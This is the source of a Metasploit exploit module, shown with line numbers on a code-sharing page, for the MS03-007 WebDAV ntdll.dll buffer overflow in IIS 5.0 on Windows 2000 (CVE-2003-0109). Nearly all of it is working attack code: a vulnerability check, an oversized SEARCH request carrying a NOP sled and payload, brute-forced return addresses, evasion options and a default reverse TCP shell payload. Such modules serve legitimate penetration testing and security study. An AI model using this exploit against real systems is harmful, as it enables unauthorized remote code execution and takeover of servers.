Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
16
        'Description' => %q{
17
          This exploits a buffer overflow in NTDLL.dll on Windows 2000
18
          through the SEARCH WebDAV method in IIS. This particular
19
          module only works against Windows 2000. It should have a
20
          reasonable chance of success against SP0 to SP3.
21
        },
22
        'Author' => [ 'hdm' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          ['CVE', '2003-0109'],
26
          ['OSVDB', '4467'],
27
          ['BID', '7116'],
28
          ['PACKETSTORM', '30939'],
29
          ['MSB', 'MS03-007']
30
        ],
31
        'Privileged' => false,
32
        'Payload' => {
33
          'Space' => 512,
34
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
35
          'StackAdjustment' => -3500
36
        },
37
        'Platform' => 'win',
38
        'Arch' => [ARCH_X86],
39
        'Targets' => [
40
          [ 'Automatic Brute Force', {} ],
41
        ],
42
        'DefaultOptions' => {
43
          'PAYLOAD' => 'windows/shell/reverse_tcp'
44
        },
45
        'Notes' => {
46
          'Reliability' => [REPEATABLE_SESSION],
47
          'Stability' => [CRASH_SERVICE_DOWN],
48
          'SideEffects' => [IOC_IN_LOGS]
49
        },
50
        'DisclosureDate' => '2003-05-30',
51
        'DefaultTarget' => 0
52
      )
53
    )
54

55
    register_evasion_options(
56
      [
57
        # XXX: We don't have a style for module-local evasion settings yet, so use Advanced's formatting
58
        OptBool.new('InvalidSearchRequest', [false, 'Replace the valid XML search with random data', false]),
59

60
        # XXX - ugh, there has to be a better way to remove entries from an
61
        # enum that overwriting the evalable enum option
62
        OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none', 'hex-normal'], 'none'])
63
      ], self.class
64
    )
65

66
    deregister_options('HTTP::junk_params', 'HTTP::header_folding')
67
  end
68

69
  def autofilter
70
    # Common vulnerability scanning tools report port 445/139
71
    # due to how they test for the vulnerability. Remap this
72
    # back to 80 for automated exploitation
73

74
    rport = datastore['RPORT'].to_i
75
    if (rport == 139 || rport == 445)
76
      datastore['RPORT'] = 80
77
    end
78

79
    true
80
  end
81

82
  def check
83
    # Verify the service is running first
84
    res = send_request_raw({ 'uri' => '/' }, 5)
85
    return CheckCode::Safe('Connection failed') unless res
86

87
    xml = "<?xml version=\"1.0\"?>\r\n"
88
    xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
89
    xml << "<g:sql>\r\n"
90
    xml << "Select \"DAV:displayname\" from scope()\r\n"
91
    xml << "</g:sql>\r\n"
92
    xml << "</g:searchrequest>\r\n"
93

94
    response = send_request_cgi({
95
      'uri' => "/#{'x' * 65535}",
96
      'ctype' => 'text/xml',
97
      'method' => 'SEARCH',
98
      'data' => xml
99
    }, 5)
100

101
    if response && response.body.to_s.include?('Server Error(exception')
102
      return CheckCode::Vulnerable("We've hit a server error (exception)")
103
    end
104

105
    # Request-URI Too Long
106
    if response && response.code == 414
107
      return CheckCode::Safe("The server returned #{response.code} (#{response.message})")
108
    end
109

110
    # Did the server stop accepting requests?
111
    begin
112
      send_request_raw({ 'uri' => '/' }, 5)
113
    rescue StandardError
114
      return CheckCode::Appears('The server stopped accepting requests') unless res
115
    end
116

117
    CheckCode::Safe
118
  end
119

120
  def exploit
121
    # Verify the service is running first
122
    res = send_request_raw({ 'uri' => '/' }, 5)
123
    fail_with(Failure::Unreachable, 'Connection failed') unless res
124

125
    # Common offsets
126
    common_offsets = [
127
      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)
128
      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
129
      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
130
      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
131
      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
132
      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)
133
    ]
134

135
    # Generic Bruteforce - Windows 2000 Professional
136
    pro_offsets = [
137
      "\x41\xa8", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
138
      "\x41\xa9", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
139
      "\x41\xaa", # Windows 2000 Professional (SP1 EN / SP2 FR / SP2 PT)
140
      "\x41\xab", # Windows 2000 Professional (SP1 AR)
141
      "\x41\xac", # Windows 2000 Professional (SP0 FI)
142
      "\x41\xad", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)
143
      "\x41\xae", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)
144
      "\x41\xaf",
145

146
      "\x41\xb0",
147
      "\x41\xb1", # Windows 2000 Professional (SP0 EN)
148
      "\x41\xb2", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 PT)
149
      "\x41\xb3", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 FR / SP2 PT)
150
      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
151
      "\x41\xb5", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP2 EN / SP2 FR / SP2 PT)
152
      "\x41\xb6", # Windows 2000 Professional (SP0 NL / SP1 AR / SP2 FR / SP2 PT)
153
      "\x41\xb7", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP1 AR / SP1 CZ / SP2 FR)
154
      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)
155
      "\x41\xb9", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 AR / SP2 FR / SP2 PT)
156
      "\x41\xba", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP2 FR)
157
      "\x41\xbb", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 PT)
158
      "\x41\xbc", # Windows 2000 Professional (SP0 FI / SP1 AR / SP2 FR)
159
      "\x41\xbd", # Windows 2000 Professional (SP0 FI / SP0 TR)
160
      "\x41\xbe", # Windows 2000 Professional (SP0 TR)
161
      "\x41\xbf", # Windows 2000 Professional (SP0 FI)
162
    ]
163

164
    # Generic Bruteforce - Windows 2000 Server
165
    server_offsets = [
166
      "\x4f\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
167
      "\x4f\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
168
      "\x4f\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
169
      "\x4f\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)
170
      "\x4f\xc4", # Windows 2000 Server (SP2 EN)
171
      "\x4f\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)
172
      "\x4f\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)
173
      "\x4f\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)
174
      "\x4f\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)
175
      "\x4f\xc9", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
176
      "\x4f\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
177
      "\x4f\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP0 TR / SP1 EN / SP2 EN)
178
      "\x4f\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)
179
      "\x4f\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP0 TR)
180
      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
181
      "\x4f\xcf", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 EN / SP2 EN)
182

183
      "\x4f\x40",
184
      "\x4f\x41",
185
      "\x4f\x42", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
186
      "\x4f\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
187
      "\x4f\x44",
188
      "\x4f\x45",
189
      "\x4f\x46",
190
      "\x4f\x47", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR)
191
      "\x4f\x48",
192
      "\x4f\x49",
193
      "\x4f\x4a",
194
      "\x4f\x4b",
195
      "\x4f\x4c",
196
      "\x4f\x4d",
197
      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)
198
      "\x4f\x4f",
199

200
      "\x41\x40",
201
      "\x41\x41",
202
      "\x41\x42", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
203
      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
204
      "\x41\x44",
205
      "\x41\x45",
206
      "\x41\x46",
207
      "\x41\x47", # Windows 2000 Server (SP0 ES / SP0 HU)
208
      "\x41\x48", # Windows 2000 Server (SP1 SE)
209
      "\x41\x49",
210
      "\x41\x4a",
211
      "\x41\x4b",
212
      "\x41\x4c",
213
      "\x41\x4d",
214
      "\x41\x4e",
215
      "\x41\x4f",
216

217
      "\x41\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
218
      "\x41\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
219
      "\x41\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
220
      "\x41\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)
221
      "\x41\xc4", # Windows 2000 Server (SP2 EN)
222
      "\x41\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)
223
      "\x41\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)
224
      "\x41\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)
225
      "\x41\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)
226
      "\x41\xc9", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
227
      "\x41\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
228
      "\x41\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
229
      "\x41\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)
230
      "\x41\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 IT / SP0 HU / SP0 NL / SP0 PT / SP0 TR)
231
      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
232
      "\x41\xcf", # Windows 2000 Server (SP0 DE / SP0 ES / SP0 NL / SP0 TR / SP1 EN / SP1 SE / SP2 EN)
233
    ]
234

235
    if datastore['InvalidSearchRequest']
236
      xml = rand_text(32..1056)
237
    else
238
      xml = "<?xml version=\"1.0\"?>\r\n"
239
      xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
240
      xml << "<g:sql>\r\n"
241
      xml << "Select \"DAV:displayname\" from scope()\r\n"
242
      xml << "</g:sql>\r\n"
243
      xml << "</g:searchrequest>\r\n"
244
    end
245

246
    # The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
247
    # This decodes to "inc ecx"
248
    url = 'A' * (65_516 - payload.encoded.length)
249
    url << payload.encoded
250

251
    offsets = common_offsets.concat(server_offsets).concat(pro_offsets).uniq
252

253
    offsets.each_with_index do |ret, index|
254
      print_status("Trying return address #{format('0x%.8x', Rex::Text.to_unicode(ret).unpack('V*').first)} (#{index + 1} / #{offsets.length})...")
255
      url[283, 2] = ret
256

257
      begin
258
        send_request_cgi({
259
          'uri' => "/#{url}",
260
          'ctype' => 'text/xml',
261
          'method' => 'SEARCH',
262
          'data' => xml
263
        }, 5)
264
      rescue StandardError => e
265
        print_error("Attempt failed: #{e}")
266
      end
267

268
      1.upto(8) do |_i|
269
        select(nil, nil, nil, 0.25)
270
        break if session_created?
271
      end
272

273
      break if session_created?
274

275
      fail_with(Failure::Unreachable, 'Giving up, IIS must have completely crashed') unless service_running?
276
    end
277
  end
278

279
  # Try connecting to the server up to 20 times, with a two second gap
280
  # This gives the server time to recover after a failed exploit attempt
281
  def service_running?
282
    print_status('Checking if IIS is back up after a failed attempt...')
283
    1.upto(20) do |i|
284
      break if session_created?
285

286
      return true if send_request_raw({ 'uri' => '/' }, 5)
287

288
      print_error("Connection failed (#{i} of 20)...")
289
      select(nil, nil, nil, 2)
290
    end
291
    false
292
  end
293
end
294

295